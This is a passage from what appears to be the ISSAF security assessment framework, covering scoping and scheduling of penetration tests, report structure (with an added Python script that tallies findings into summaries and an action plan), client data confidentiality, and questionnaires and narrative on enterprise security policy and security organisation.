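    return str(PurePosixPath(base) / _clean_field(domain_or_task) / filename)
```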
5.2.2 Time of Assessment and Availability of Staff
• To reduce downtime, perform active assessment during off-business hours. Remember that in this case you will not get a realistic picture of the assessment. This is recommended while performing automated probing on critical devices.
• Make sure target organization staff are present during active assessment. It will reduce the downtime, just in case it occurs.
• ISSAF does not recommend any form of denial of service attacks (regular DoS or distributed DoS).
5.2.3 A Mechanism for Dealing with False Positives to Avoid Calling Law Enforcement Unnecessarily
• Alarms should be configured in such a manner that only the appropriate person(s) receive the warnings.
• Before calling law enforcement, senior management permission should be taken.
• Senior management permission will also help avoid calling law enforcement unnecessarily.
5.2.4 Obtain IP Addresses or Ranges that Need to be Assessed
• Obtain the IP addresses or ranges (network / sub-network) that need to be assessed.
• Verify all the IP addresses (those gathered through whois/DNS and the received ones) with the tested company (to prevent scanning somebody else).
• Obtain information about any specific IP addresses / subnets, hosts or domains that should be restricted.
5.2.5 Assessment Centre IP Addresses
• Inform the client about the source IP addresses of the assessment centre / machines from which a penetration test needs to be conducted. It will help the customer differentiate legitimate security assessment attacks from illegal hacker attempts.
• Make sure access to services from these access points is open from the customer firewall.
• Add the IP addresses where the tests are coming from to “white lists” if these are used (and if black lists with automatic blocking are used), to prevent a false sense of security when the results are presented.
5.3 POST ASSESSMENT PHASE
After the assessment phase, the analysis and report submission activity starts. Various
guidelines and best practices are suggested for various activities of this phase.
5.3.1 Reporting
5.3.1.1 PLANNING AND PREPARATION
Before starting the report writing process you should plan the activities for preparing and submitting the report. A great deal of effort is required to make a good report. It really doesn’t matter how good an assessment you did if you don’t convey it to the client in an appropriate format. It is generally seen that people who perform the assessment don’t like writing the assessment report, and it is good to assign the document writing part to someone who has the skills and interest for it.
• Organize the documentation based on the deliverables established.
• Ensure the reporting documentation carries a data classification.
• Ensure document control procedures are followed.
• Show a preview of the reporting structure to the client before the final document submission.
1. Team meeting
2. Responsibilities of team members
   a. Team Leader
   b. Assessors
   c. Technical writers
3. Give appropriate data to the appropriate team member
5.3.1.2 ANALYSIS
Analysis of test results shall be conducted on an individual basis and with the entire team (peer review). All the results should be shared with team members. Discussion should focus on the vulnerabilities identified and their verification based on the assessment conducted.
a. Who should perform the analysis?
   i. Analysis by a specific team member
   ii. Peer review by another team member
   iii. Final review by a subject matter expert
b. Objectives of the analysis
   i. Determining the current security posture of the customer. This helps when recommending safeguards.
   ii. Reviewing identified vulnerabilities and the countermeasures for them
   iii. Removing any vulnerability that is not appropriate
   iv. Reviewing recommended countermeasures, if any
   v. Identifying more vulnerabilities
5.3.1.3 REPORT CREATION, MERGER AND FORMATTING
ISSAF recommends the following structure for the report:
• Executive Summary
  o Scope of work
  o Nature of assessment (internal / external)
  o Summarized out of scope work
  o Objectives
  o Time period of work performed
  o Summary of findings with graphical chart
    - Assessment performed on number of systems/hosts
    - Total vulnerable hosts
    - Very-High risk vulnerabilities
    - High risk vulnerabilities
    - Medium risk vulnerabilities
    - Low risk vulnerabilities
  o Findings at a glance as per domain
• Vulnerability Summary Review
  o The vulnerability summary report should include:
    - Name of vulnerability
    - Description of vulnerability
    - Severity of vulnerability
    - Affected system
    - Countermeasure to safeguard against the vulnerability
  o As per domain/assessed component, the severity of vulnerabilities should contain the following information:
    - Very-High risk vulnerabilities
    - High risk vulnerabilities
    - Low risk vulnerabilities
    - Informative vulnerabilities
    - None
• Action plan (all recommendations summarized into one table) with priorities assigned.
• Detailed Test Results with Countermeasures
  o Tools used
  o Date of test
  o IP address / domain name / host / device name (as applicable)
  o Description of test
  o Tools' plain output (logs)
  o Analysis/conclusion/observation
  o Countermeasure
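As an added example that is not part of ISSAF, the following Python turns a list of verified findings into the executive summary counts, the per-domain "findings at a glance" and the prioritised action plan called for by the structure above. The finding record fields, the priority ordering rule and the sample hosts and findings are constructed for illustration.

```python
from collections import Counter, defaultdict

# Severity levels in the order the executive summary lists them (index 0 is the
# most severe); 'Informative' comes from the per-domain summary.
SEVERITIES = ["Very-High", "High", "Medium", "Low", "Informative"]
REQUIRED_FIELDS = ("name", "description", "severity", "host", "domain", "countermeasure")


def validate_finding(finding: dict) -> dict:
    """Reject a record that lacks a field the vulnerability summary must carry."""
    missing = [k for k in REQUIRED_FIELDS if not finding.get(k)]
    if missing:
        raise ValueError(f"finding {finding.get('name')!r} is missing {missing}")
    if finding["severity"] not in SEVERITIES:
        raise ValueError(f"unknown severity {finding['severity']!r}")
    return finding


def executive_summary(hosts_assessed, findings) -> dict:
    """Figures for the 'summary of findings' block of the executive summary."""
    findings = [validate_finding(f) for f in findings]
    assessed = set(hosts_assessed)
    # A finding on a host that was never in scope is a scoping error, not a result.
    outside = {f["host"] for f in findings} - assessed
    if outside:
        raise ValueError(f"findings on hosts outside the assessed list: {sorted(outside)}")
    per_severity = Counter(f["severity"] for f in findings)
    summary = {
        "hosts_assessed": len(assessed),
        "vulnerable_hosts": len({f["host"] for f in findings}),
    }
    summary.update({sev: per_severity.get(sev, 0) for sev in SEVERITIES})
    return summary


def findings_at_a_glance(domains, findings) -> dict:
    """Per-domain severity counts; a domain with nothing found reads 'None'."""
    per_domain = defaultdict(Counter)
    for f in findings:
        per_domain[f["domain"]][f["severity"]] += 1
    return {d: dict(per_domain[d]) or "None" for d in domains}


def action_plan(findings) -> list:
    """One row per distinct countermeasure, most severe first, then by hosts affected,
    so the top of the table is what the customer should fix first."""
    rows = {}
    for f in findings:
        row = rows.setdefault(f["countermeasure"],
                              {"severity": f["severity"], "hosts": set()})
        row["hosts"].add(f["host"])
        if SEVERITIES.index(f["severity"]) < SEVERITIES.index(row["severity"]):
            row["severity"] = f["severity"]  # a countermeasure inherits its worst finding
    ordered = sorted(rows.items(),
                     key=lambda kv: (SEVERITIES.index(kv[1]["severity"]), -len(kv[1]["hosts"])))
    return [{"priority": i + 1, "countermeasure": cm, "severity": r["severity"],
             "hosts": sorted(r["hosts"])} for i, (cm, r) in enumerate(ordered)]


# Constructed sample input: placeholder hosts, domains and findings.
HOSTS = ["10.0.0.1", "10.0.0.2", "10.0.0.3", "10.0.0.4"]
DOMAINS = ["Server Block", "Internet Block", "Management Block"]
FINDINGS = [
    {"name": "Outdated SSH daemon", "description": "Version with known flaws",
     "severity": "High", "host": "10.0.0.1", "domain": "Server Block",
     "countermeasure": "Patch the SSH daemon"},
    {"name": "Outdated SSH daemon", "description": "Version with known flaws",
     "severity": "High", "host": "10.0.0.2", "domain": "Server Block",
     "countermeasure": "Patch the SSH daemon"},
    {"name": "Default SNMP community string", "description": "Read access with 'public'",
     "severity": "Very-High", "host": "10.0.0.3", "domain": "Internet Block",
     "countermeasure": "Change SNMP community strings and restrict SNMP access"},
    {"name": "Service banner reveals version", "description": "Banner leaks software version",
     "severity": "Informative", "host": "10.0.0.1", "domain": "Server Block",
     "countermeasure": "Suppress version information in service banners"},
]

if __name__ == "__main__":
    print(executive_summary(HOSTS, FINDINGS))
    print(findings_at_a_glance(DOMAINS, FINDINGS))
    for row in action_plan(FINDINGS):
        print(row)
```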
5.3.1.4 FINAL REVIEW BY THE LEAD
Before sending the report to the client, a final review shall be done by the project lead and quality assurance for the project.
5.3.1.5 CLOSING THE DOCUMENT AND SENDING IT TO CUSTOMER
• Ensure document control and data classification are implemented in the document.
• An executive summary and a letter to the client lead can be added.
5.3.2 Presentation
5.3.2.1 PRESENTATION WITH (TECHNICAL TEAM AND FUNCTION MANAGER)
• Produce an initial summary of vulnerabilities for the analysis team before the presentation.
  o Send the report some days in advance of the presentation. This should be mutually agreed with the client as per the availability of staff and convenience.
  o Generally the presenter should be the core person who has executed the tests and has good communication skills. He or she should understand that the analysis team has both technical and business people. It is his / her responsibility to make both kinds of people aware of the findings.
  o Review and discuss all the findings and the recommendations made to safeguard against them. The assessment team shall lead the technical discussion.
  o Have the tool results with you for support during the discussion.
5.3.2.2 PRESENTATION WITH MANAGEMENT
The management presentation should carry the main summary of the assessment with supporting reasons of why, what, when, which, where and how. It should also include the key action points. The presentation should include quantitative charts and tables of summarized information. This information matches the executive summary section of the report.
5.3.3 After Presentation
5.3.3.1.1 ACCEPTANCE CRITERIA ARE MET
Ensure that the acceptance criteria are met. Refer to the Appendix for a sample template. This template will contain all the test cases required to be performed as per ISSAF.
5.3.3.1.2 ENSURE RECOMMENDATIONS HAVE BEEN ADDRESSED
Ensure recommendations have been addressed. Follow up for reasonable assurance that the recommendations to plug the vulnerabilities have been addressed.
5.3.3.2 HELP CUSTOMER
Ensure the customer is not facing any problem in safeguarding against the vulnerabilities. Make sure you have answered all the questions regarding countermeasures to safeguard the customer organization. Ask the customer if they need any other help before marking the assessment as closed, since the assessor may need to deploy his resources on other projects.
5.3.3.3 MAINTAIN CONFIDENTIALITY OF CUSTOMER DATA
All information used before and during the project will normally be used in the reports generated to present the results of the security assessment. In order to maintain the confidentiality of this information, all reports and additional files (such as access log files, network traces and the like) must be kept and transmitted in a form that guarantees the confidentiality of the information, even in the event that storage media is misplaced or stolen.
Once stored, the information should be accessible on a need to know basis. The reports may include information regarding the need to patch software, harden systems, or establish firewalls, IDS or IPS systems. This kind of information should be made available only to the parties who should make infrastructure improvements following the recommendations produced after the security test.
Best Practices / Guidelines | Compliance (Yes/No) | Comments
Do not disclose any customer data to any person outside the project team. If shared, it must be on a need to know basis and must not violate the Non Disclosure Agreement (NDA). | ✓ |
Protect customer data by encryption of stored files and folders. | ✓ |
Implement host based firewall, intrusion detection, integrity check, updated anti-virus, latest patches and security on the server where client’s data gathered during the course of assessment is stored. | ✓ |
Always use encryption during electronic transmission of client data. | ✓ |
Maintain a clear screen and clear desk policy with power-on password and screen saver password on lab systems and/or systems used for assessment. | ✓ |
Do not encourage or allow visitors or people other than team members into the assessment area. Meet visitors or other employees in a conference room. | ✓ |
Refer to the client and project name by a code; don't call them by name. | ✓ |
Repair and prepare the assessment machine on your own or in your presence. | ✓ |
Ensure assessor machine/desktop media is wiped and cleaned before handover to another team under any circumstances. | ✓ |
Ensure all client related data (including CDs, floppies, report copies and print outs containing client data) is destroyed. | ✓ |
Take a backup of client data in encrypted form and store this on optical disks in fireproof safes at remote locations. Destroy this backup once the client receives the required data and it is not needed anymore. | ✓ |
No discussion of client assignments should be done in public areas or under the influence of alcohol. | ✓ |
Take customer related print outs on a secure printer and shred the unwanted hard copies. | ✓ |
All customer related documents including drafts must be marked confidential and have a cover page and distribution list on them. | ✓ |
Have a policy which defines the action on violation of customer data confidentiality. | ✓ |
Customer information should be stored on a secure system in an encrypted manner, with access controls applied and access to information given on a need to know basis. | ✓ |
Customer data like reports and proposals shouldn't be shared for business development and/or with prospective clients. | ✓ |
Never ever share your previous client information with your current employer. | ✓ |
Never ever share any client information in articles, papers and/or in the news. | ✓ |
Desktops/laptops should have an operating system which supports access control. | ✓ |
6 ENTERPRISE SECURITY POLICY
6.1 INTRODUCTION
Enterprise Information security policy states the management commitment and direction
for implementation and management of information security within the enterprise.
6.2 PRE-REQUISITE
A documented and formalized enterprise security policy and its update schedule, together with any audit/review reports of the enterprise security policy. If a copy of the policy can't be obtained, request the areas covered in the policy / the table of contents of the policy.
6.3 OBJECTIVE
To establish whether the enterprise has formalized, implemented and communicated enterprise security policies, standards, procedures and guidelines within the enterprise.
6.4 ASSESSMENT QUESTIONNAIRE
This section contains a set of suggested evaluation check lists that are expected to
broadly fit the ISSAF based assessment process. Recognizing that each organization
has its own unique processes, technologies and information processing architecture, it is
possible that the ISSAF evaluation may need further steps to be performed. It is also
possible that some of the suggested checks may need amplification. The assessor who
is carrying out the ISSAF based evaluation should therefore use these check lists as
guides and evolve a process that best fits the organization being reviewed.
Evaluation Check (Yes / No / N/A / Evaluation Performed and Results)
1 Does the organization have a formally approved and documented enterprise security policy?
2 Is the enterprise security policy available for review? If not, has there been any third party
review, and if so, is any report available for review?
3 Does the organization have documented enterprise security procedures, standards and
guidelines? And are they available for review?
4 Are all concerned parties (Business Managers/HR/Accounts/IT/Security/Legal) involved in the
formation of the security policy?
5 Does the policy include:
5.1 Management Statement on information security
5.2 Disciplinary Statement
5.3 Scope & Applicability
5.4 High Level Roles & Responsibilities
5.5 Acceptable Usage guidelines for information systems users
5.6 Information retention policy (e.g. how long to keep data in custody)
6 Does the User policy address:
6.1 Acceptable usage
6.2 E-mail Usage
6.3 Internet Usage
6.4 Encryption of Sensitive Data
6.5 Antivirus Policy
6.6 Password protection
6.7 Remote Access Policy
6.8 Incident Reporting Guidelines
6.9 Disciplinary action for non-compliance
7 Does the administrator & other IT staff policy address:
7.1 Physical & Environmental Security
7.2 Network & Systems Security
7.3 Wireless Security
7.4 Application Development & Deployment
7.5 Internet & Third Party Connectivity
7.6 Vendor Engagement Policy
7.7 Technology standards for the organization
7.8 Technology change control
7.9 Backup & Systems Availability
8 Does the policy address the following areas for business owners:
8.1 Risk Assessment & Classification
8.2 Outsourced service providers engagement
8.3 Business Continuity & Disaster Recovery
9 Does the policy address the following areas for security staff:
9.1 Monitoring & review of systems security events
9.2 Systems vulnerability assessment & penetration testing
9.3 Third party engagement review
9.4 Incident response
9.5 Business Continuity Planning & Disaster Recovery
9.6 Security Awareness & training
10 Is the policy communicated to the organization's employees via trainings?
11 Does the policy go through a periodic review and is it updated accordingly?
12 Security Awareness and training for management and end users.
13 Does the policy address concerns related to business ethics?
13.1 Is the Non-disclosure agreement formally signed by employees?
13.2 Does the compliance policy include disciplinary actions?
6.5 ASSESSMENT QUESTIONNAIRE - NARRATIVE
The following narrative supports the understanding of the contents and logic that is
embedded in the assessment questionnaire. While the questionnaire is structured on
the basis of possible process flow that may be found in many enterprises, the narrative is
presented to aid an understanding of the concepts covered in this domain.
6.5.1 Overview
Information security policies support the implementation of effective security in an enterprise.
Security policies are statements that are derived from an alignment of information security to
the business requirements, as endorsed by the executive management of the enterprise. As it is
emerging today, security policies are used as vehicles that communicate executive management
commitment to securing information assets. In addition, these policies provide an overview of
the security stance of an organization and lend credibility to security activities.
While the generic reason for having a comprehensive security policy is to demonstrate top
management support for security activities and to ensure that appropriate directions are
available for implementing the controls in the context of the chosen security architecture, it
is equally important from a legal perspective. When a corporation or its executive management
is sued or questioned by stakeholders in the context of safeguarding assets (including
information assets), one of the first things that would be sought is to determine whether the
enterprise had a security policy in place commensurate with the nature and size of the business.
This fits well into the concept of ‘due care’ that is expected of custodians of enterprise
information assets. The creation and enforcement of an enterprise-wide security policy would
also demonstrate that management went through the process of ‘due diligence’ and fully
satisfies the ‘prudent man rule.’ It also protects employees so long as they fully follow the
security policies and can demonstrate, when questioned, that they adhered to what executive
management expected them to do in terms of implementing security mechanisms.
Two approaches are often seen in the creation and implementation of security policies: the
bottom-up approach and the top-down approach. The former is seen when IT departments (or a few
people in the department) try to create and implement a security policy. This is frequently done
through the use of technology. It may not have the kind of visibility required or even the degree
of credibility it deserves, but it is a very common occurrence. In contrast, top management
drives the top-down approach, which has the advantages of requisite funding, enforcement and
visibility (or awareness). These two approaches still co-exist because IT and executive
management don’t talk the same language: management does not understand all the acronyms and
jargon of IT, while IT finds it difficult to understand the strategic business language. One
quip often heard is that businesses do not exist to buy more firewalls and spend on upgrading
IDS systems. Managers want a ‘business case’ established, and IT finds it hard to fit into this
approach, not because they don’t understand it fully but because IT still does not neatly fit
into known financial approaches to deciding on ‘business cases.’ Having said that, it must also
be said in fairness to IT that management also needs to understand that their strategic
competitive advantage depends significantly on the information technology and processing
infrastructure they have deployed.
Guidelines for valuation of assets (used in a variety of ways – for assessing insurance
premiums, calculating the RTO while performing a BIA, implementing access control models…) are
best placed in the security policy since it is endorsed at the highest level in the
organization. Another important role played by the security policy is in the process of creating
Business Continuity Planning (BCP) and Disaster Recovery Planning (DRP), which requires building
on the layered defenses that the security architecture would have created. Fine-tuning the
recovery strategy requires the definition of security parameters, especially when the recovery
is physically carried out at a location outside the premises of the enterprise. The security
policy has a significant contribution to make in this case.
Policies, apart from demonstrating executive management’s commitment to securing information
assets, are also used as a vehicle to periodically reinforce security-related messages,
continuously raise security awareness and push for goal congruence between corporate goals and
security goals. It is arguable as to who has to work for the goal congruence: is it to be done
by the IT managers responsible for security, to align it with corporate goals and objectives, or
should it be done by top management? The policy is also to be used for defining the various
human interfaces of security. Primarily, the policy sets the framework for the security
organization structure, the description of job responsibilities and the constitution of security
teams (like the security implementation team, security assessment team, A&P team, forensics
team, assurance team, etc.). Organizations do not have all these teams functioning on a
permanent basis; they are quickly assembled whenever a security incident occurs or is suspected.
Even the definition of what constitutes a security incident needs clarity, to move carefully
between the extremes of complacency and over-reaction. All these are addressed in the security
policy.
A further function of the security policy is to provide clear guidelines on how to handle a
conflict that might arise when implementing a security mechanism. The conflict could be due to
multiple locations in the same organization interpreting their security needs differently, or
due to different professionals interpreting a security situation differently, or even a basic
question like ‘Is this a security breach?’ The policy assists managers in taking a consistent,
fair and appropriate stand in the face of these conflicts.
6.5.2 Policy and Trust
Information security policies, like every other enterprise policy, involve people. Policies are
designed and implemented so that the actions and interactions of people among themselves and
with the constituents of Information Processing Facilities, the Trusted Computing Base, etc. are
consistent with the enterprise security stance. The moment we talk of interaction amongst
humans, it involves trust-related issues. Policy writers take two extreme standpoints, though
most policy designers tend to tread the middle path. One extreme is to state that policies are
written only because we always think people will not do the right things. The other extreme is
to design policies on the presumption that people would do only the right things! As can be
readily seen, neither of these extremes is always true. Even if we desire to trust all systems
and people, what has been witnessed in the past forces us to move away and start distrusting
people and processes. Software from reliable sources suddenly throws up a bug, or someone
discovers a Trojan in it, or a backdoor carefully concealed! A trusted person gets into a
problem when on vacation and the stand-by colleague discovers something odd – leading to a trail
of frauds! When a security policy is written, it may be prudent, conservatively, not to totally
trust any person or process to function correctly always and under all conditions. Trust takes
time to build. Careful monitoring over long periods can build sufficient trust to relax parts of
a control if such control dilution can add other advantages - most importantly effectiveness in
operations or a general feeling of goodness, which could lead to greater efficiencies in
operations. There are no hard and fast rules on trust; it depends on a variety of variables
including organizational culture and the sensitivity of the information asset being handled.
Determining the right level of trust is a delicate and very difficult task; too little of it may
lead to high attrition rates or low morale, and too much might eventually result in security
infractions. Maintaining the right level of trust is a good acid test for successful managers.
6.5.3 Some issues of design
Policies affect the way people work. It is therefore good practice to work on consensus-based
policy development and implementation wherever possible. While it is not always possible to get
a consensus on all policy issues due to a number of factors, it would be worthwhile to get all
those who would be affected by the implementation of the policy to review it and share their
views as to how the proposed policy could impact their work – in terms of productivity, personal
efficiencies, adherence to best practices, the impact of changes from what is currently
happening, etc. At the stage of eliciting this consensus, if it is demonstrated that the
implementation of a policy would result in an unfavorable situation, it may be worthwhile
re-visiting the policy.
It is important to review the policy with the IT support staff just as is done with users,
since IT support staff would be involved heavily in the implementation of the policy. Since
implementation of a policy is as important as designing and monitoring it, the IT support
function that would be involved in implementation should be fully involved in this process.
Often the views of the IT support staff result in significant enhancements to the degree of
controls and the manner of implementing controls.
Security policies, like all other corporate policies and plans, tend to get outdated and
obsolete. A clear process of change management needs to be put in place to ensure that any
policy changes take place alongside changes in any of the attributes that have an impact on the
policy. A clear process of version control is also to be built and implemented so that
different parts of the organization do not conform to different versions of the policy!
Policies that are not appropriately disseminated are no policies at all. All users and anyone
who is in any way connected with a policy implementation should have a copy of the policy, and
the policy dissemination process should include a way of getting the users and others to
acknowledge, in unambiguous terms, that they have received a copy of the policy, studied and
understood it and agree to abide by it. This document is a must for the organization to enforce
the policy and also to ensure that where the policy is violated, no defense can be taken in a
court of law by the person who violated the policy that he / she did not know of the existence
of such a policy. Continuous awareness must be created through a variety of ways including
security awareness programs, policy awareness workshops and regular stress in corporate internal
communications that adherence to policies will result in better security.
While this chapter’s objectives are to help a user assess an existing security policy, it
also attempts to give a user enough knowledge of the key factors to consider in formulating
a security policy & the critical components that should be included in it.
6.5.4 Security Policy Development Model for Security Policies
6.5.4.1 ESTABLISHING A POLICY TEMPLATE
The Risk Assessment Methodology, the classification levels & the security services needed
for securing the information systems are good guiding principles for establishing a security
policy for the entire organization. The Legal department should also ascertain that the
statements within the policy are in compliance with local regulations & other privacy laws.
The policy should have disciplinary statements that mention the punishment meted out in case
of non-compliance with the policies. The policies could be high-level statements about the
management’s intention to treat information security within the firm as a priority, and they
may also be detailed in terms of outlining the various controls & strategies the firm may use
to secure the information.
6.5.5 The Policy must address:
6.5.5.1 MANAGEMENT STATEMENT ON INFORMATION SECURITY
This statement shall include the management’s commitment & support to information
security within the organization. This will also encourage other business units to
participate in the information security program for the firm.
6.5.5.2 DISCIPLINARY STATEMENT
The policy must include a statement describing the disciplinary process that shall be followed
in case of non-compliance with the policies mentioned below. Disciplinary measures can be up
to termination of employment.
6.5.5.3 THE SECURITY ORGANIZATION & THE ROLES AND RESPONSIBILITIES
This section should include the various roles in the information security program. This
should include at minimum the roles of the Information Security Officer, the information
owners, the end users & the systems administrators.
6.5.6 For the End-Users
6.5.6.1 ACCEPTABLE USE OF COMPUTER SYSTEMS & RESOURCES
This policy talks about how information systems are important to the organization and about
prudent usage of computer systems by the employees. Most organizations have a policy stating
that all data stored on the organization’s computer systems belongs to the organization & that
employee activity may be monitored.
6.5.6.2 E-MAIL USAGE POLICY
This policy talks about prudent usage of e-mail resources. This means that the employees can
use the e-mail system for personal purposes as long as there isn’t significant usage of the
organization’s bandwidth.
6.5.6.3 INTERNET USAGE
Internet usage is mostly granted to employees requiring access for business purposes.
Employees are also advised against posting any comments on websites with the
company e-mail id unless authorized to do so.
6.5.6.4 ENCRYPTION OF SENSITIVE DATA
Employees should be advised to encrypt sensitive information before sending it over the
Internet, using the firm’s approved products. They should also confirm the identity of senders
and ensure that information is from an authentic source before using it.
6.5.6.5 ANTI-VIRUS POLICY
The anti-virus policy should advise users to scan attachments from external sources before
opening them. They should also report virus incidents to the concerned people, which could help
in containing the viruses/worms before they start spreading to other systems.
6.5.6.6 PASSWORD PROTECTION POLICY
The password protection policy talks about the selection of passwords & password complexity,
and other parameters like password change frequency and password history.
6.5.6.7 REMOTE ACCESS POLICY
The remote access policy asks users to ensure that all controls like personal firewalls etc.
are running properly before they connect to the firm’s systems. This should also create
awareness among users about the possible installation of key loggers and other Trojans while
connecting to the firm’s systems from the Internet or other untrusted networks.
6.5.6.8 INCIDENT REPORTING POLICY
This policy should educate the users on possible security breaches and the way these
incidents are to be reported to the concerned authorities.
Some Companies ask the employees to sign the Intellectual Property Rights agreement
so that the Company’s IPR is safeguarded. The IPR Agreement needs to be prepared
according to the company’s business needs and in consultation with legal Department.
6.5.7 For the Information Owners
6.5.7.1 RISK ASSESSMENT & ASSET CLASSIFICATION
The information owners should be entrusted with the Risk assessment & classification of
the information systems in their purview. They, along with the representatives from the
information security department must classify & label the data by analyzing the threats.
In case of shared systems across multiple business units the business managers must
co-own the data & all of them must be involved in the risk assessment exercise.
Information owners must be entrusted with the responsibility of completing the Risk
assessment exercise and the information security representatives must act as
consultants in facilitating this process.
6.5.7.2 OUTSOURCED SERVICE PROVIDERS ENGAGEMENT POLICY
The information owners must notify the information security department about possible
engagements with outsourced service providers before establishing a relationship. The
information security department should analyze whether the service providers meet the
minimum criteria required so that the organization’s data can be entrusted to the service
provider. Service Level Agreements (SLAs) need to be defined for the outsourced agency.
6.5.7.3 BUSINESS CONTINUITY & DISASTER RECOVERY POLICY
The information owners must be advised to make continuity plans in case of exigencies.
The BCP team or the Information Security team would facilitate this process. This also
requires the information owners to maintain the required call trees and establish DR
processes for the business’s information systems.
6.5.8 For the IT Department
6.5.8.1 PHYSICAL SECURITY OF INFORMATION SYSTEMS
This policy must advise the IT Department or other departments (Administration) to
deploy all possible security controls to protect the information systems from damage,
loss & theft. This may require deploying & operating controls like a PACS (Personal Access
Control System). This should also talk about equipment siting & the procedures to be followed
when physical access is required (like maintaining a log of all access to the server systems).
This should also address the procedure for operating environmental controls.
6.5.8.2 NETWORK & SYSTEMS SECURITY POLICY
This should discuss the security mechanisms to be implemented on network & server
systems. The main criterion for the configuration of systems should be that access to
resources is granted as required.
6.5.8.3 WIRELESS SECURITY
This is an area which is a matter of grave concern. The wireless systems should be
properly configured with adequate authorization & authentication methods.
6.5.8.4 APPLICATION DEVELOPMENT & DEPLOYMENT
The application development & deployment policy should talk about how security should
be a consideration at the time of application development itself. The policy should also
specify that the application must first be unit tested, then tested in an integration
environment, and only after it passes the security tests should it be deployed on the
production systems.
6.5.8.5 INTERNET & THIRD PARTY CONNECTIVITY
This policy should talk about secure connectivity to the Internet & third parties. The
organization’s acceptable method for external connectivity & the authorization process for
the same should be discussed. Some organizations conduct a penetration test on the
third party networks before allowing connectivity into their systems.
6.5.8.6 VENDOR ENGAGEMENT POLICY
The vendor engagement policy would discuss the minimum security criteria a vendor must
adhere to before the organization can establish a relationship. For example, a vendor should
have performed a proper background check of all its employees before the vendor’s
representatives work with the organization.
6.5.8.7 BACKUP & SYSTEMS AVAILABILITY POLICY
This policy entrusts the proper functioning of the network infrastructure & backup of
information systems to the IT Department.
6.5.9 For the Information Security Department
6.5.9.1 MONITORING & REVIEW OF SYSTEM SECURITY EVENTS
The information security team should be advised to check the security events on a
regular basis and report breaches or incidents serious in nature to the management. The
information security team should regularly monitor for any non-compliance to the security
policy as well & work with the business units to have those rectified.
6.5.9.2 SYSTEMS VULNERABILITY ASSESSMENT & PENETRATION TESTING
The information security department is often entrusted with the responsibility of
conducting vulnerability assessment & penetration tests. This policy talks about how
these must be carried out with proper authorization.
6.5.9.2.1 THIRD PARTY (VENDOR & OUTSOURCED SERVICE PROVIDERS) ENGAGEMENT REVIEW
The information security team may be required to go onsite & conduct reviews of the
service providers & vendors to ensure that they comply with the minimum security criteria
required by the organization. This policy details the information security roles in the
process.
6.5.9.2.2 INCIDENT RESPONSE
The incident response policy details the method of investigating any reported security
breaches. How & when law enforcement agencies must be contacted & who should be
responsible for communicating with the media should be covered.
6.5.9.2.3 BUSINESS CONTINUITY PLANNING
The information security department should also facilitate the BCP for the various
business units & should review test results & apprise management of the same.
6.5.9.2.4 SECURITY AWARENESS & TRAINING
This is an often-overlooked subject; the information security department must be
responsible for training all users in the organization. They must also design &
constantly update their security awareness programs.
7 ENTERPRISE SECURITY ORGANIZATION & MANAGEMENT
7.1 INTRODUCTION
7.2 PRE-REQUISITE
Document containing organizational structure of entire organization, IT department,
enterprise security organization, internal audit. Document containing formally approved
roles and responsibilities, job description for enterprise security functions, any third party
assessment/review etc...
7.3 OBJECTIVE
To evaluate management support to the security functions, identify segregation of
duties, third party security and to address outsourcing security concerns.
7.4 ASSESSMENT QUESTIONNAIRE
This section contains a set of suggested evaluation check lists that are expected to
broadly fit the ISSAF based assessment process. Recognizing that each organization
has its own unique processes, technologies and information processing architecture, it is
possible that the ISSAF evaluation may need further steps to be performed. It is also
possible that some of the suggested checks may need amplification. The assessor who
is carrying out the ISSAF based evaluation should therefore use these check lists as
guides and evolve a process that best fits the organization being reviewed.
Evaluation Check (Yes / No / N/A / Evaluation Performed and Results)
1 Management Support
1.1 Does the organization have a formally approved enterprise security organization?
1.2 Is there adequate management support for information security within the firm?
1.3 Has the Chief Security Officer/Chief Information Security Officer (CSO/CISO) been formally
authorized to ensure that other departments implement recommendations made with respect to
security?
1.4 Are the responsibilities for each of the roles in the information security department
clearly defined?
1.5 Does the enterprise security organization have an appropriate relationship with:
    The HR department
    The IT department
    The various business departments
    Legal Department
    The employees of the company
    Administration Department (This generally takes care of the in-house activities and facility
    management in some companies)
2 Segregation of duties
    Is there any conflict or overlap of roles that can potentially cause the security to collapse?
    E.g. enterprise security personnel reporting to the IT department.
    Is there proper segregation of duties within the information security department?
    Is there any overlap of responsibilities due to this segregation of duties?
    Are two-person controls exercised within the company?
    Are mandatory vacations implemented for enterprise security personnel?
    Are peer reviews performed on enterprise security, if applicable?
3 Third party security concerns
    Is there any formally approved policy regarding third party access to enterprise information
    systems (physical and logical)?
    Is there any compliance review performed to ensure third party access to enterprise
    information systems is based on approved policies?
    Is there formally signed-off documentation for approvals and reviews of third party access?
4 Outsourcing
    Is there any legally defined contract between both parties for outsourced security
    services / solutions?
    Has this contract been reviewed by the legal department for legal and regulatory compliance?
    Does the contract contain a non-disclosure clause relating to enterprise information assets?
    Is there any clause specifying damages to be paid in the event of non-compliance?
    Has the enterprise performed a security evaluation of the outsourcer's information systems
    used in delivering the services? If not, has there been a third party review of the
    outsourcer's information systems used in delivering the services?
    Is there any process to evaluate the services provided against the service level agreements?
    Is there any process to terminate the contract?
7.5 ASSESSMENT QUESTIONNAIRE - NARRATIVE
The following narrative supports the understanding of the contents and logic that is
embedded in the assessment questionnaire. While the questionnaire is structured on
the basis of possible process flow that may be found in many enterprises, the narrative is
presented to aid an understanding of the concepts covered in this domain.
7.5.1 Introduction
The security organization plays a vital role in the effective implementation of policies & in
maintaining the overall security posture of a company. Most companies generally consider
information security as information technology security. The scope of information security is
much broader than just IT security, since information in an organizational context extends
beyond data processing and computers and therefore involves a lot of interaction with other
business departments. For such reasons, some argue that it is best to have information
security aligned to the Operations Department. Organizational status and independence of the
information security function has a significant impact on the effectiveness and efficiency of
the security function. Traditional organization theory has it that the higher the head of a
function reports to, the greater is the independence of that function. While this has been
challenged in a few studies, we can safely recommend that for optimal levels of organizational
independence, the head of the Information Security Organization should report to the head of
the organization. Everything else is a compromise. There are a few who argue that, information
security being too technical a matter, the head of security operations should ideally report
to the CIO. That approach merits little attention, since the CIO is responsible for the
efficient and effective use of the information assets for furthering business objectives, and
the function of protecting information assets is too specialized to be bracketed with
operational responsibilities. It also matters how information is viewed in the organizational
context – is it seen as a support function, as an enabling function, as a driver, or as a
function that directly contributes to creating and sustaining strategic competitive advantage?
This perception best drives the organization structure of the security organization and its
responsibility – authority paradigm.
There are a number of organization-driven controls (also referred to as Administrative
Controls) that add to the overall security of the organization’s information assets without
necessarily resorting to technology for conceptualization or implementation.
7.5.2 Segregation of Duties
Segregation of duties is a very important administrative control in information security.
